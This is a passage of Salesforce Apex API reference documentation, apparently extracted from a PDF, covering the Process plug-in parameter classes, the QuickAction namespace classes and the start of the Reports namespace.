PluginDescribeResult.OutputParameter(String, String, Process.PluginDescribeResult.ParameterType)
Creates a new instance of the Process.PluginDescribeResult.OutputParameter class using the specified name,
description, and parameter type.
PluginDescribeResult.OutputParameter(String, Process.PluginDescribeResult.ParameterType)
Creates a new instance of the Process.PluginDescribeResult.OutputParameter class using the specified name,
description, and parameter type.
Signature
public PluginDescribeResult.OutputParameter(String name, String description,
Process.PluginDescribeResult.ParameterType parameterType)
Parameters
name
Type: String
Unique name of the plug-in.
description
Type: String
Describes the purpose of the plug-in.
parameterType
Type: Process.PluginDescribeResult.ParameterType
The data type of the input parameter.
1200
Reference
PluginDescribeResult.OutputParameter Class
PluginDescribeResult.OutputParameter(String, Process.PluginDescribeResult.ParameterType)
Creates a new instance of the Process.PluginDescribeResult.OutputParameter class using the specified name,
description, and parameter type.
Signature
public PluginDescribeResult.OutputParameter(String name,
Process.PluginDescribeResult.ParameterType parameterType)
Parameters
name
Type: String
Unique name of the plug-in.
parameterType
Type: Process.PluginDescribeResult.ParameterType
The data type of the input parameter.
PluginDescribeResult.OutputParameter Properties
The following are properties for PluginDescribeResult.OutputParameter.
IN THIS SECTION:
Description
This optional field describes the purpose of the plug-in.
Name
Unique name of the plug-in.
ParameterType
The data type of the input parameter.
Description
This optional field describes the purpose of the plug-in.
Signature
public String Description {get; set;}
Property Value
Type: String
Usage
Size limit: 255 characters.
1201
Reference
PluginRequest Class
Name
Unique name of the plug-in.
Signature
public String Name {get; set;}
Property Value
Type: String
Usage
Size limit: 40 characters.
ParameterType
The data type of the input parameter.
Signature
public Process.PluginDescribeResult.ParameterType ParameterType {get; set;}
Property Value
Type: Process.PluginDescribeResult.ParameterType
PluginRequest Class
Passes input parameters from the class that implements the Process.Plugin interface to the flow.
Namespace
Process
PluginRequest Properties
The following are properties for PluginRequest.
IN THIS SECTION:
inputParameters
Input parameters that are passed from the class that implements the Process.Plugin interface to the flow.
inputParameters
Input parameters that are passed from the class that implements the Process.Plugin interface to the flow.
1202
Reference
PluginResult Class
Signature
public MAP<String,ANY> inputParameters {get; set;}
Property Value
Type: Map<String, Object>
PluginResult Class
Returns output parameters from the class that implements the Process.Plugin interface to the flow.
Namespace
Process
PluginResult Properties
The following are properties for PluginResult.
IN THIS SECTION:
outputParameters
Output parameters returned from the class that implements the interface to the flow.
outputParameters
Output parameters returned from the class that implements the interface to the flow.
Signature
public MAP<String, ANY> outputParameters {get; set;}
Property Value
Type: Map<String, Object>
QuickAction Namespace
The QuickAction namespace provides classes and methods for publisher actions.
The following are the classes in the QuickAction namespace.
IN THIS SECTION:
DescribeAvailableQuickActionResult Class
Contains describe metadata information for a quick action that is available for a specified parent.
DescribeLayoutComponent Class
Represents the smallest unit in a layouta field or a separator.
1203
Reference
DescribeAvailableQuickActionResult Class
DescribeLayoutItem Class
Represents an individual item in a QuickAction.DescribeLayoutRow.
DescribeLayoutRow Class
Represents a row in a QuickAction.DescribeLayoutSection.
DescribeLayoutSection Class
Represents a section of a layout and consists of one or more columns and one or more rows (an array of
QuickAction.DescribeLayoutRow).
DescribeQuickActionDefaultValue Class
Returns a default value for a quick action.
DescribeQuickActionResult Class
Contains describe metadata information for a publisher quick action.
QuickActionRequest Class
Use the QuickAction.QuickActionRequest class for providing action information for quick actions to be performed by
QuickAction class methods. Action information includes the action name, context record ID, and record.
QuickActionResult Class
After you initiate a publisher action with the QuickAction class, use the QuickActionResult class for processing action
results.
DescribeAvailableQuickActionResult Class
Contains describe metadata information for a quick action that is available for a specified parent.
Namespace
QuickAction
Usage
The QuickAction describeAvailableQuickActions method returns an array of available quick action describe result objects
(QuickAction.DescribeAvailableQuickActionResult).
Note: In the application, QuickActions are referred to as actions or publisher actions.
DescribeAvailableQuickActionResult Methods
The following are methods for DescribeAvailableQuickActionResult. All are instance methods.
IN THIS SECTION:
getLabel()
The publisher action label.
getName()
The publisher action name.
getType()
The publisher action type.
1204
Reference
DescribeLayoutComponent Class
getLabel()
The publisher action label.
Signature
public String getLabel()
Return Value
Type: String
getName()
The publisher action name.
Signature
public String getName()
Return Value
Type: String
getType()
The publisher action type.
Signature
public String getType()
Return Value
Type: String
DescribeLayoutComponent Class
Represents the smallest unit in a layouta field or a separator.
Namespace
QuickAction
Usage
Note: In the application, QuickActions are referred to as actions or publisher actions.
1205
Reference
DescribeLayoutComponent Class
DescribeLayoutComponent Methods
The following are methods for DescribeLayoutComponent. All are instance methods.
IN THIS SECTION:
getDisplayLines()
Returns the vertical lines displayed for a field. Applies to textarea and multi-select picklist fields.
getTabOrder()
Returns the tab order for the item in the row.
getType()
Returns the name of the QuickAction.DescribeLayoutComponent type for this component.
getValue()
Returns the name of the field if the type for QuickAction.DescribeLayoutComponent is textarea.
getDisplayLines()
Returns the vertical lines displayed for a field. Applies to textarea and multi-select picklist fields.
Signature
public Integer getDisplayLines()
Return Value
Type: Integer
getTabOrder()
Returns the tab order for the item in the row.
Signature
public Integer getTabOrder()
Return Value
Type: Integer
getType()
Returns the name of the QuickAction.DescribeLayoutComponent type for this component.
Signature
public String getType()
1206
Reference
DescribeLayoutItem Class
Return Value
Type: String
getValue()
Returns the name of the field if the type for QuickAction.DescribeLayoutComponent is textarea.
Signature
public String getValue()
Return Value
Type: String
DescribeLayoutItem Class
Represents an individual item in a QuickAction.DescribeLayoutRow.
Namespace
QuickAction
Usage
For most fields on a layout, there is only one component per layout item. However, in a display-only view, the
QuickAction.DescribeLayoutItem might be a composite of the individual fields (for example, an address can consist of
street, city, state, country, and postal code data). On the corresponding edit view, each component of the address field would be split
up into separate QuickAction.DescribeLayoutItems.
Note: In the application, QuickActions are referred to as actions or publisher actions.
DescribeLayoutItem Methods
The following are methods for DescribeLayoutItem. All are instance methods.
IN THIS SECTION:
getLabel()
Returns the label text for this item.
getLayoutComponents()
Returns a list of QuickAction.DescribeLayoutComponents for this item.
isEditable()
Indicates whether this item can be edited (true) or not (false).
isPlaceholder()
Indicates whether this item is a placeholder (true) or not (false). If true, then this item is blank.
1207
Reference
DescribeLayoutItem Class
isRequired()
Indicates whether this item is required (true) or not (false).
getLabel()
Returns the label text for this item.
Signature
public String getLabel()
Return Value
Type: String
getLayoutComponents()
Returns a list of QuickAction.DescribeLayoutComponents for this item.
Signature
public List<QuickAction.DescribeLayoutComponent> getLayoutComponents()
Return Value
Type: List<QuickAction.DescribeLayoutComponent>
isEditable()
Indicates whether this item can be edited (true) or not (false).
Signature
public Boolean isEditable()
Return Value
Type: Boolean
isPlaceholder()
Indicates whether this item is a placeholder (true) or not (false). If true, then this item is blank.
Signature
public Boolean isPlaceholder()
Return Value
Type: Boolean
1208
Reference
DescribeLayoutRow Class
isRequired()
Indicates whether this item is required (true) or not (false).
Signature
public Boolean isRequired()
Return Value
Type: Boolean
Usage
This is useful if, for example, you want to render required fields in a contrasting color.
DescribeLayoutRow Class
Represents a row in a QuickAction.DescribeLayoutSection.
Namespace
QuickAction
Usage
A QuickAction.DescribeLayoutRow consists of one or more QuickAction.DescribeLayoutItem objects. For
each QuickAction.DescribeLayoutRow, a QuickAction.DescribeLayoutItem refers either to a specific field or
to an empty QuickAction.DescribeLayoutItem (one that contains no QuickAction.DescribeLayoutComponent
objects). An empty QuickAction.DescribeLayoutItem can be returned when a given
QuickAction.DescribeLayoutRow is sparse (for example, containing more fields on the right column than on the left column).
Note: In the application, QuickActions are referred to as actions or publisher actions.
DescribeLayoutRow Methods
The following are methods for DescribeLayoutRow. All are instance methods.
IN THIS SECTION:
getLayoutItems()
Returns either a specific field or an empty QuickAction.DescribeLayoutItem (one that contains no
QuickAction.DescribeLayoutComponent objects).
getNumItems()
Returns the number of QuickAction.DescribeLayoutItem.
1209
Reference
DescribeLayoutSection Class
getLayoutItems()
Returns either a specific field or an empty QuickAction.DescribeLayoutItem (one that contains no
QuickAction.DescribeLayoutComponent objects).
Signature
public List<QuickAction.DescribeLayoutItem> getLayoutItems()
Return Value
Type: List<QuickAction.DescribeLayoutItem>
getNumItems()
Returns the number of QuickAction.DescribeLayoutItem.
Signature
public Integer getNumItems()
Return Value
Type: Integer
DescribeLayoutSection Class
Represents a section of a layout and consists of one or more columns and one or more rows (an array of
QuickAction.DescribeLayoutRow).
Namespace
QuickAction
DescribeLayoutSection Methods
The following are methods for DescribeLayoutSection.
IN THIS SECTION:
getColumns()
Returns the number of columns in the QuickAction.DescribeLayoutSection.
getHeading()
The heading text (label) for the QuickAction.DescribeLayoutSection.
getLayoutRows()
Returns an array of one or more QuickAction.DescribeLayoutRow objects.
getRows()
Returns the number of rows in the QuickAction.DescribeLayoutSection.
1210
Reference
DescribeLayoutSection Class
isUseCollapsibleSection()
Indicates whether the QuickAction.DescribeLayoutSection is a collapsible section (true) or not (false).
isUseHeading()
Indicates whether to use the heading (true) or not (false).
getColumns()
Returns the number of columns in the QuickAction.DescribeLayoutSection.
Signature
public Integer getColumns()
Return Value
Type: Integer
getHeading()
The heading text (label) for the QuickAction.DescribeLayoutSection.
Signature
public String getHeading()
Return Value
Type: String
getLayoutRows()
Returns an array of one or more QuickAction.DescribeLayoutRow objects.
Signature
public List<QuickAction.DescribeLayoutRow> getLayoutRows()
Return Value
Type: List<QuickAction.DescribeLayoutRow>
getRows()
Returns the number of rows in the QuickAction.DescribeLayoutSection.
Signature
public Integer getRows()
1211
Reference
DescribeQuickActionDefaultValue Class
Return Value
Type: Integer
isUseCollapsibleSection()
Indicates whether the QuickAction.DescribeLayoutSection is a collapsible section (true) or not (false).
Signature
public Boolean isUseCollapsibleSection()
Return Value
Type: Boolean
isUseHeading()
Indicates whether to use the heading (true) or not (false).
Signature
public Boolean isUseHeading()
Return Value
Type: Boolean
DescribeQuickActionDefaultValue Class
Returns a default value for a quick action.
Namespace
QuickAction
Usage
Represents the default values of fields to use in default layouts.
Note: In the application, QuickActions are referred to as actions or publisher actions.
DescribeQuickActionDefaultValue Methods
The following are methods for DescribeQuickActionDefaultValue. All are instance methods.
IN THIS SECTION:
getDefaultValue()
Returns the default value of the quick action.
1212
Reference
DescribeQuickActionResult Class
getField()
Returns the field name of the action.
getDefaultValue()
Returns the default value of the quick action.
Signature
public String getDefaultValue()
Return Value
Type: String
getField()
Returns the field name of the action.
Signature
public String getField()
Return Value
Type: String
DescribeQuickActionResult Class
Contains describe metadata information for a publisher quick action.
Namespace
QuickAction
Usage
The QuickAction describeQuickActions method returns an array of quick action describe result objects
(QuickAction.DescribeQuickActionResult).
Note: In the application, QuickActions are referred to as actions or publisher actions.
DescribeQuickActionResult Methods
The following are methods for DescribeQuickActionResult. All are instance methods.
1213
Reference
DescribeQuickActionResult Class
IN THIS SECTION:
getCanvasApplicationName()
Returns the name of the Canvas application, if used.
getDefaultValues()
Returns the default values for a action.
getHeight()
Returns the height in pixels of the action pane.
getIconName()
Returns the actions icon name.
getIconUrl()
Returns the URL of the 32x32 icon used for the action.
getIcons()
Returns a list of Schema.DescribeIconResult objects that describe colors used in a tab.
getLabel()
Returns the action label.
getLayout()
Returns the layout sections that comprise an action.
getMiniIconUrl()
Returns the 16x16 icon URL.
getName()
Returns the action name.
getSourceSobjectType()
Returns the object type used for the action.
getTargetParentField()
Returns the parent objects type for the action.
getTargetRecordTypeId()
Returns the record type of the targeted record.
getTargetSobjectType()
Returns the actions target object type.
getType()
Returns a create or custom Visualforce action.
getVisualforcePageName()
If Visualforce is used, returns the name of the associated page for the action.
getWidth()
If a custom action is created, returns the width in pixels of the action pane.
getCanvasApplicationName()
Returns the name of the Canvas application, if used.
1214
Reference
DescribeQuickActionResult Class
Syntax
public String getCanvasApplicationName()
Return Value
Type: String
getDefaultValues()
Returns the default values for a action.
Signature
public List<QuickAction.DescribeQuickActionDefaultValue> getDefaultValues()
Return Value
Type: List<QuickAction.DescribeQuickActionDefaultValue>
getHeight()
Returns the height in pixels of the action pane.
Signature
public Integer getHeight()
Return Value
Type: Integer
getIconName()
Returns the actions icon name.
Signature
public String getIconName()
Return Value
Type: String
getIconUrl()
Returns the URL of the 32x32 icon used for the action.
Signature
public String getIconUrl()
1215
Reference
DescribeQuickActionResult Class
Return Value
Type: String
getIcons()
Returns a list of Schema.DescribeIconResult objects that describe colors used in a tab.
Signature
public List<Schema.DescribeIconResult> getIcons()
Return Value
Type: List<Schema.DescribeIconResult>
getLabel()
Returns the action label.
Signature
public String getLabel()
Return Value
Type: String
getLayout()
Returns the layout sections that comprise an action.
Signature
public QuickAction.DescribeLayoutSection getLayout()
Return Value
Type: QuickAction.DescribeLayoutSection
getMiniIconUrl()
Returns the 16x16 icon URL.
Signature
public String getMiniIconUrl()
Return Value
Type: String
1216
Reference
DescribeQuickActionResult Class
getName()
Returns the action name.
Signature
public String getName()
Return Value
Type: String
getSourceSobjectType()
Returns the object type used for the action.
Signature
public String getSourceSobjectType()
Return Value
Type: String
getTargetParentField()
Returns the parent objects type for the action.
Signature
public String getTargetParentField()
Return Value
Type: String
getTargetRecordTypeId()
Returns the record type of the targeted record.
Signature
public String getTargetRecordTypeId()
Return Value
Type: String
getTargetSobjectType()
Returns the actions target object type.
1217
Reference
QuickActionRequest Class
Signature
public String getTargetSobjectType()
Return Value
Type: String
getType()
Returns a create or custom Visualforce action.
Signature
public String getType()
Return Value
Type: String
getVisualforcePageName()
If Visualforce is used, returns the name of the associated page for the action.
Signature
public String getVisualforcePageName()
Return Value
Type: String
getWidth()
If a custom action is created, returns the width in pixels of the action pane.
Signature
public Integer getWidth()
Return Value
Type: Integer
QuickActionRequest Class
Use the QuickAction.QuickActionRequest class for providing action information for quick actions to be performed by
QuickAction class methods. Action information includes the action name, context record ID, and record.
1218
Reference
QuickActionRequest Class
Namespace
QuickAction
Usage
For Apex saved using Salesforce API version 28.0, a parent ID is associated with the QuickActionRequest instead of the context ID.
The constructor of this class takes no arguments:
QuickAction.QuickActionRequest qar = new QuickAction.QuickActionRequest();
Example
In this sample, a new quick action is created to create a contact and assign a record to it.
QuickAction.QuickActionRequest req = new QuickAction.QuickActionRequest();
// Some quick action name
req.quickActionName = Schema.Account.QuickAction.AccountCreateContact;
// Define a record for the quick action to create
Contact c = new Contact();
c.lastname = 'last name';
req.record = c;
// Provide the context ID (or parent ID). In this case, it is an Account record.
req.contextid = '001xx000003DGcO';
QuickAction.QuickActionResult res = QuickAction.performQuickAction(req);
IN THIS SECTION:
QuickActionRequest Constructors
QuickActionRequest Methods
SEE ALSO:
QuickAction Class
QuickActionRequest Constructors
The following are constructors for QuickActionRequest.
IN THIS SECTION:
QuickActionRequest()
Creates a new instance of the QuickAction.QuickActionRequest class.
1219
Reference
QuickActionRequest Class
QuickActionRequest()
Creates a new instance of the QuickAction.QuickActionRequest class.
Signature
public QuickActionRequest()
QuickActionRequest Methods
The following are methods for QuickActionRequest. All are instance methods.
IN THIS SECTION:
getContextId()
Returns this QuickActions context record ID.
getQuickActionName()
Returns this QuickActions name.
getRecord()
Returns the QuickActions associated record.
setContextId(Id)
Sets this QuickActions context ID. Returned by getContextId.
setQuickActionName(String)
Sets this QuickActions name. Returned by getQuickActionName.
setRecord(SObject)
Sets a record for this QuickAction. Returned by getRecord.
getContextId()
Returns this QuickActions context record ID.
Signature
public Id getContextId()
Return Value
Type: ID
getQuickActionName()
Returns this QuickActions name.
Signature
public String getQuickActionName()
1220
Reference
QuickActionRequest Class
Return Value
Type: String
getRecord()
Returns the QuickActions associated record.
Signature
public SObject getRecord()
Return Value
Type: sObject
setContextId(Id)
Sets this QuickActions context ID. Returned by getContextId.
Signature
public Void setContextId(Id contextId)
Parameters
contextId
Type: ID
Return Value
Type: Void
Usage
For Apex saved using SalesforceAPI version 28.0, sets this QuickActions parent ID and is returned by getParentId.
setQuickActionName(String)
Sets this QuickActions name. Returned by getQuickActionName.
Signature
public Void setQuickActionName(String name)
Parameters
name
Type: String
1221
Reference
QuickActionResult Class
Return Value
Type: Void
setRecord(SObject)
Sets a record for this QuickAction. Returned by getRecord.
Signature
public Void setRecord(SObject record)
Parameters
record
Type: sObject
Return Value
Type: Void
QuickActionResult Class
After you initiate a publisher action with the QuickAction class, use the QuickActionResult class for processing action
results.
Namespace
QuickAction
Usage
Note: In the application, QuickActions are referred to as actions or publisher actions.
SEE ALSO:
QuickAction Class
QuickActionResult Methods
The following are methods for QuickActionResult. All are instance methods.
IN THIS SECTION:
getErrors()
If an error occurs, an array of one or more database error objects, along with error codes and descriptions, is returned.
getIds()
The IDs of the QuickActions being processed.
1222
Reference
QuickActionResult Class
isCreated()
Returns true if the action is created; otherwise, false.
isSuccess()
Returns true if the action completes successfully; otherwise, false.
getErrors()
If an error occurs, an array of one or more database error objects, along with error codes and descriptions, is returned.
Signature
public List<Database.Error> getErrors()
Return Value
Type: List<Database.Error>
getIds()
The IDs of the QuickActions being processed.
Signature
public List<Id> getIds()
Return Value
Type: List<Id>
isCreated()
Returns true if the action is created; otherwise, false.
Signature
public Boolean isCreated()
Return Value
Type: Boolean
isSuccess()
Returns true if the action completes successfully; otherwise, false.
Signature
public Boolean isSuccess()
1223
Reference
Reports Namespace
Return Value
Type: Boolean
Reports Namespace
The Reports namespace provides classes for accessing the same data as is available in the Salesforce1 Reporting REST API.
The following are the classes in the Reports namespace.
IN THIS SECTION:
AggregateColumn Class
Contains methods for describing summary fields such as Record Count, Sum, Average, Max, Min, and custom summary formulas.
Includes name, label, data type, and grouping context.
ColumnDataType Enum
The Reports.ColumnDataType enum describes the type of data in a column. It is returned by the getDataType method.
ColumnSortOrder Enum
The Reports.ColumnSortOrder enum describes the order that the grouping column uses to sort data.
DateGranularity Enum
The Reports.DateGranularity enum describes the date interval that is used for grouping.
DetailColumn Class
Contains methods for describing fields that contain detailed data. Detailed data fields are also listed in the report metadata.
Dimension Class
Contains information for each row or column grouping.
FilterOperator Class
Contains information about a filter operator, such as display name and API name.
FilterValue Class
Contains information about a filter value, such as the display name and API name.
GroupingColumn Class
Contains methods for describing fields that are used for column grouping.
GroupingInfo Class
Contains methods for describing fields that are used for grouping.
GroupingValue Class
Contains grouping values for a row or column, including the key, label, and value.
ReportCurrency Class
Contains information about a currency value, including the amount and currency code.
ReportDataCell Class
Contains the data for a cell in the report, including the display label and value.
ReportDescribeResult Class
Contains report, report type, and extended metadata for a tabular, summary, or matrix report.
ReportDetailRow Class
Contains data cells for a detail row of a report.
1224
Reference
AggregateColumn Class
ReportExtendedMetadata Class
Contains report extended metadata for a tabular, summary, or matrix report.
ReportFact Class
Contains the fact map for the report, which represents the reports data values.
ReportFactWithDetails Class
Contains the detailed fact map for the report, which represents the reports data values.
ReportFilter Class
Contains information about a report filter, including column, operator, and value.
ReportFormat Enum
Contains the possible report format types.
ReportInstance Class
Returns an instance of a report that was run asynchronously. Retrieves the results for that instance.
ReportManager Class
Runs a report synchronously or asynchronously and with or without details.
ReportMetadata Class
Contains report metadata for a tabular, summary, or matrix report.
ReportResults Class
Contains the results of running a report.
ReportType Class
Contains the unique API name and display name for the report type.
ReportTypeColumn Class
Contains detailed report type metadata about a field, including data type, display name, and filter values.
ReportTypeColumnCategory Class
Contains category information for all fields in the report type.
ReportTypeMetadata Class
Contains report type metadata, which gives you information about the fields that are available in each section of the report type,
plus filter information for those fields.
SummaryValue Class
Contains summary data for a cell of the report.
Reports Exceptions
The Reports namespace contains exception classes.
AggregateColumn Class
Contains methods for describing summary fields such as Record Count, Sum, Average, Max, Min, and custom summary formulas. Includes
name, label, data type, and grouping context.
Namespace
Reports
1225
Reference
AggregateColumn Class
AggregateColumn Methods
The following are methods for AggregateColumn. All are instance methods.
IN THIS SECTION:
getName()
Returns the unique API name of the summary field.
getLabel()
Returns the localized display name for the summarized or custom summary formula field.
getDataType()
Returns the data type of the summarized or custom summary formula field.
getAcrossGroupingContext()
Returns the column grouping in the report where the summary field is displayed.
getDownGroupingContext()
Returns the row grouping in the report where the summary field is displayed.
getName()
Returns the unique API name of the summary field.
Syntax
public String getName()
Return Value
Type: String
getLabel()
Returns the localized display name for the summarized or custom summary formula field.
Syntax
public String getLabel()
Return Value
Type: String
getDataType()
Returns the data type of the summarized or custom summary formula field.
Syntax
public Reports.ColumnDataType getDataType()
1226
Reference
ColumnDataType Enum
Return Value
Type: Reports.ColumnDataType
getAcrossGroupingContext()
Returns the column grouping in the report where the summary field is displayed.
Syntax
public String getAcrossGroupingContext()
Return Value
Type: String
getDownGroupingContext()
Returns the row grouping in the report where the summary field is displayed.
Syntax
public String getDownGroupingContext()
Return Value
Type: String
ColumnDataType Enum
The Reports.ColumnDataType enum describes the type of data in a column. It is returned by the getDataType method.
Namespace
Reports
Enum Values
The following are the values of the Reports.ColumnDataType enum.
Value
Description
BOOLEAN_DATA
COMBOBOX_DATA
Comboboxes, which provide a set of enumerated values and enable the user to
specify a value that is not in the list
CURRENCY_DATA
Currency values
DATETIME_DATA
DateTime values
DATE_DATA
Date values
1227
Reference
ColumnSortOrder Enum
Value
Description
DOUBLE_DATA
Double values
EMAIL_DATA
Email addresses
ID_DATA
An objects Salesforce ID
INT_DATA
Integer values
MULTIPICKLIST_DATA
Multi-select picklists, which provide a set of enumerated values from which multiple
values can be selected
PERCENT_DATA
Percent values
PHONE_DATA
Phone numbers. Values can include alphabetic characters. Client applications are
responsible for phone number formatting.
PICKLIST_DATA
Single-select picklists, which provide a set of enumerated values from which only
one value can be selected
REFERENCE_DATA
STRING_DATA
String values
TEXTAREA_DATA
TIME_DATA
Time values
URL_DATA
ColumnSortOrder Enum
The Reports.ColumnSortOrder enum describes the order that the grouping column uses to sort data.
Namespace
Reports
Usage
The GroupingInfo.getColumnSortOrder() method returns a Reports.ColumnSortOrder enum value. The
GroupingInfo.setColumnSortOrder() method takes the enum value as an argument.
Enum Values
The following are the values of the Reports.ColumnSortOrder enum.
Value
Description
ASCENDING
DESCENDING
1228
Reference
DateGranularity Enum
DateGranularity Enum
The Reports.DateGranularity enum describes the date interval that is used for grouping.
Namespace
Reports
Usage
The GroupingInfo.getDateGranularity method returns a Reports.DateGranularity enum value. The
GroupingInfo.setDateGranularity method takes the enum value as an argument.
Enum Values
The following are the values of the Reports.DateGranularity enum.
Value
Description
DAY
DAY_IN_MONTH
FISCAL_PERIOD
FISCAL_QUARTER
FISCAL_WEEK
FISCAL_YEAR
MONTH
MONTH_IN_YEAR
NONE
No date grouping
QUARTER
WEEK
YEAR
DetailColumn Class
Contains methods for describing fields that contain detailed data. Detailed data fields are also listed in the report metadata.
Namespace
Reports
1229
Reference
DetailColumn Class
getName()
Returns the unique API name of the detail column field.
Syntax
public String getName()
Return Value
Type: String
getLabel()
Returns the localized display name of a standard field, the ID of a custom field, or the API name of a bucket field that has detailed data.
Syntax
public String getLabel()
Return Value
Type: String
getDataType()
Returns the data type of a detail column field.
Syntax
public Reports.ColumnDataType getDataType()
Return Value
Type: Reports.ColumnDataType
1230
Reference
Dimension Class
Dimension Class
Contains information for each row or column grouping.
Namespace
Reports
Dimension Methods
The following are methods for Dimension. All are instance methods.
IN THIS SECTION:
getGroupings()
Returns information for each row or column grouping as a list.
getGroupings()
Returns information for each row or column grouping as a list.
Syntax
public LIST<Reports.GroupingValue> getGroupings()
Return Value
Type: List<Reports.GroupingValue>
FilterOperator Class
Contains information about a filter operator, such as display name and API name.
Namespace
Reports
FilterOperator Methods
The following are methods for FilterOperator. All are instance methods.
IN THIS SECTION:
getLabel()
Returns the localized display name of the filter operator. Possible values for this name are restricted based on the data type of the
column being filtered.
1231
Reference
FilterValue Class
getName()
Returns the unique API name of the filter operator. Possible values for this name are restricted based on the data type of the column
being filtered. For example multipicklist fields can use the following filter operators: equals, not equal to, includes, and
excludes. Bucket fields are considered to be of the String type.
getLabel()
Returns the localized display name of the filter operator. Possible values for this name are restricted based on the data type of the column
being filtered.
Syntax
public String getLabel()
Return Value
Type: String
getName()
Returns the unique API name of the filter operator. Possible values for this name are restricted based on the data type of the column
being filtered. For example multipicklist fields can use the following filter operators: equals, not equal to, includes, and
excludes. Bucket fields are considered to be of the String type.
Syntax
public String getName()
Return Value
Type: String
FilterValue Class
Contains information about a filter value, such as the display name and API name.
Namespace
Reports
FilterValue Methods
The following are methods for FilterValue. All are instance methods.
IN THIS SECTION:
getLabel()
Returns the localized display name of the filter value. Possible values for this name are restricted based on the data type of the column
being filtered.
1232
Reference
GroupingColumn Class
getName()
Returns the unique API name of the filter value. Possible values for this name are restricted based on the data type of the column
being filtered.
getLabel()
Returns the localized display name of the filter value. Possible values for this name are restricted based on the data type of the column
being filtered.
Syntax
public String getLabel()
Return Value
Type: String
getName()
Returns the unique API name of the filter value. Possible values for this name are restricted based on the data type of the column being
filtered.
Syntax
public String getName()
Return Value
Type: String
GroupingColumn Class
Contains methods for describing fields that are used for column grouping.
Namespace
Reports
The GroupingColumn class provides basic information about column grouping fields. The GroupingInfo class includes
additional methods for describing and updating grouping fields.
GroupingColumn Methods
The following are methods for GroupingColumn. All are instance methods.
IN THIS SECTION:
getName()
Returns the unique API name of the field or bucket field that is used for column grouping.
1233
Reference
GroupingColumn Class
getLabel()
Returns the localized display name of the field that is used for column grouping.
getDataType()
Returns the data type of the field that is used for column grouping.
getGroupingLevel()
Returns the level of grouping for the column.
getName()
Returns the unique API name of the field or bucket field that is used for column grouping.
Syntax
public String getName()
Return Value
Type: String
getLabel()
Returns the localized display name of the field that is used for column grouping.
Syntax
public String getLabel()
Return Value
Type: String
getDataType()
Returns the data type of the field that is used for column grouping.
Syntax
public Reports.ColumnDataType getDataType()
Return Value
Type: Reports.ColumnDataType
getGroupingLevel()
Returns the level of grouping for the column.
Syntax
public Integer getGroupingLevel()
1234
Reference
GroupingInfo Class
Return Value
Type: Integer
Usage
In a summary report, 0, 1, or 2 indicates grouping at the first, second, or third row level.
In a matrix report, 0 or 1 indicates grouping at the first or second row or column level.
GroupingInfo Class
Contains methods for describing fields that are used for grouping.
Namespace
Reports
GroupingInfo Methods
The following are methods for GroupingInfo. All are instance methods.
IN THIS SECTION:
getName()
Returns the unique API name of the field or bucket field that is used for row or column grouping.
getSortOrder()
Returns the order that is used to sort data in a row or column grouping (ASCENDING or DESCENDING).
getDateGranularity()
Returns the date interval that is used for row or column grouping.
getSortAggregate()
Returns the summary field that is used to sort data within a grouping in a summary report. The value is null when data within a
grouping is not sorted by a summary field.
getName()
Returns the unique API name of the field or bucket field that is used for row or column grouping.
Syntax
public String getName()
Return Value
Type: String
getSortOrder()
Returns the order that is used to sort data in a row or column grouping (ASCENDING or DESCENDING).
1235
Reference
GroupingValue Class
Syntax
public Reports.ColumnSortOrder getSortOrder()
Return Value
Type: Reports.ColumnSortOrder
getDateGranularity()
Returns the date interval that is used for row or column grouping.
Syntax
public Reports.DateGranularity getDateGranularity()
Return Value
Type: Reports.DateGranularity
getSortAggregate()
Returns the summary field that is used to sort data within a grouping in a summary report. The value is null when data within a grouping
is not sorted by a summary field.
Syntax
public String getSortAggregate()
Return Value
Type: String
GroupingValue Class
Contains grouping values for a row or column, including the key, label, and value.
Namespace
Reports
GroupingValue Methods
The following are methods for GroupingValue. All are instance methods.
IN THIS SECTION:
getGroupings()
Returns a list of second- or third-level row or column groupings. If there are none, the value is an empty array.
1236
Reference
GroupingValue Class
getKey()
Returns the unique identifier for a row or column grouping. The identifier is used by the fact map to specify data values within each
grouping.
getLabel()
Returns the localized display name of a row or column grouping. For date and time fields, the label is the localized date or time.
getValue()
Returns the value of the field that is used as a row or column grouping.
getGroupings()
Returns a list of second- or third-level row or column groupings. If there are none, the value is an empty array.
Syntax
public LIST<Reports.GroupingValue> getGroupings()
Return Value
Type: List<Reports.GroupingValue>
getKey()
Returns the unique identifier for a row or column grouping. The identifier is used by the fact map to specify data values within each
grouping.
Syntax
public String getKey()
Return Value
Type: String
getLabel()
Returns the localized display name of a row or column grouping. For date and time fields, the label is the localized date or time.
Syntax
public String getLabel()
Return Value
Type: String
getValue()
Returns the value of the field that is used as a row or column grouping.
1237
Reference
ReportCurrency Class
Syntax
public Object getValue()
Return Value
Type: Object
Usage
The value depends on the fields data type.
Currency fields:
amount: Of type currency. A data cells value.
currency: Of type picklist. The ISO 4217 currency code, if available; for example, USD for US dollars or CNY for Chinese yuan.
(If the grouping is on the converted currency, this value is the currency code for the report and not for the record.)
Picklist fields: API name. For example, a custom picklist fieldType of Business with values 1, 2, and 3 for Consulting,
Services, and Add-On Business respectivelyhas 1, 2, or 3 as the grouping value.
ID fields: API name.
Record type fields: API name.
Date and time fields: Date or time in ISO-8601 format.
Lookup fields: Unique API name. For example, for the Opportunity Owner lookup field, the ID of each opportunity owners
Chatter profile page can be a grouping value.
ReportCurrency Class
Contains information about a currency value, including the amount and currency code.
Namespace
Reports
ReportCurrency Methods
The following are methods for ReportCurrency. All are instance methods.
IN THIS SECTION:
getAmount()
Returns the amount of the currency value.
getCurrencyCode()
Returns the report currency code, such as USD, EUR, or GBP, for an organization that has multicurrency enabled. The value is null
if the organization does not have multicurrency enabled.
getAmount()
Returns the amount of the currency value.
1238
Reference
ReportDataCell Class
Syntax
public Decimal getAmount()
Return Value
Type: Decimal
getCurrencyCode()
Returns the report currency code, such as USD, EUR, or GBP, for an organization that has multicurrency enabled. The value is null if
the organization does not have multicurrency enabled.
Syntax
public String getCurrencyCode()
Return Value
Type: String
ReportDataCell Class
Contains the data for a cell in the report, including the display label and value.
Namespace
Reports
ReportDataCell Methods
The following are methods for ReportDataCell. All are instance methods.
IN THIS SECTION:
getLabel()
Returns the localized display name of the value of a specified cell in the report.
getValue()
Returns the value of a specified cell of a detail row of a report.
getLabel()
Returns the localized display name of the value of a specified cell in the report.
Syntax
public String getLabel()
1239
Reference
ReportDescribeResult Class
Return Value
Type: String
getValue()
Returns the value of a specified cell of a detail row of a report.
Syntax
public Object getValue()
Return Value
Type: Object
ReportDescribeResult Class
Contains report, report type, and extended metadata for a tabular, summary, or matrix report.
Namespace
Reports
